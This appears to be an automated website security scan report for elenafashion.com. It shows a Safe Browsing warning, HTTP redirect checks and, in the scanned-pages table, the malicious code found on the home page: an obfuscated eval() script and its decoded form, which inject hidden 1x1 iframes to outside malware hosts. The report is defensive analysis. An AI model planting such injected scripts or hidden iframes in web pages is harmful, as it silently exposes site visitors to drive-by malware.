Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=elenafashion.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://elenafashion.com/ | 200 OK Content-Length: 3452 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: loading-atm.net eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('f 4=6 5(),2=6 5(4.d()+g);c(0.7.9("8=1")==-1){0.b("<3 a=1 e=1 o=\'n://h-q.m/l/\' i=\'j:k\'></3>");0.7="8=1;"+" 2="+2.p()+"; "}',27,27,'document||expires|iframe|today|Date|new|cookie|_atmbit|indexOf|width|write|if|getTime|height|var|2678400000|loading|style|display|none|b2b|net|http|src|toGMTString|atm'.split('|'))) Decoded script: var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_atmbit=1")==-1){document.write("<iframe width=1 height=1 src='http://loading-atm.net/b2b/' style='display:none'></iframe>");document.cookie="_atmbit=1;"+" expires="+expires.toGMTString()+"; "} var today=new Date(),expires=new Date(today.getTime()+2678400000);if(document.cookie.indexOf("_atmbit=1")==-1){document.write("<iframe width=1 height=1 src='http://loading-atm.net/b2b/' style='display:none'></iframe>");document.cookie="_atmbit=1;"+" expires="+expires.toGMTString()+"; "} <iframe width=1 height=1 src='http://loading-atm.net/b2b/' style='display:none'></iframe> Hidden iFrame found. size: 1x1 style: hidden src: http://internetcountercheck.com/?click=9468281 <iframe src="http://internetcountercheck.com/?click=9468281" width=1 height=1 style="visibility:hidden;position:absolute"> Hidden iFrame found. size: 1x1 style: hidden src: http://litetopfindworld.cn/in.cgi?cocacola48 <iframe src="http://litetopfindworld.cn/in.cgi?cocacola48" width=1 height=1 style="visibility: hidden"> | ||
http://elenafashion.com/test404page.js | 404 Not Found Content-Length: 522 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: elenafashion.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 14:36:22 GMT
Accept-Ranges: bytes
ETag: "7839112-d7c-c48cd200"
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 3452
Content-Type: text/html
Last-Modified: Fri, 17 Dec 2010 18:59:20 GMT
...3452 bytes of data.
GET / HTTP/1.1
Host: elenafashion.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 14:36:22 GMT
Accept-Ranges: bytes
ETag: "7839112-d7c-c48cd200"
Server: Apache/2.0.64 (Unix) mod_ssl/2.0.64 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 3452
Content-Type: text/html
Last-Modified: Fri, 17 Dec 2010 18:59:20 GMT
...3452 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: elenafashion.com
Referer: http://www.google.com/search?q=elenafashion.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: elenafashion.com
Referer: http://www.google.com/search?q=elenafashion.com
Result:
The result is similar to the first query. There are no suspicious redirects found.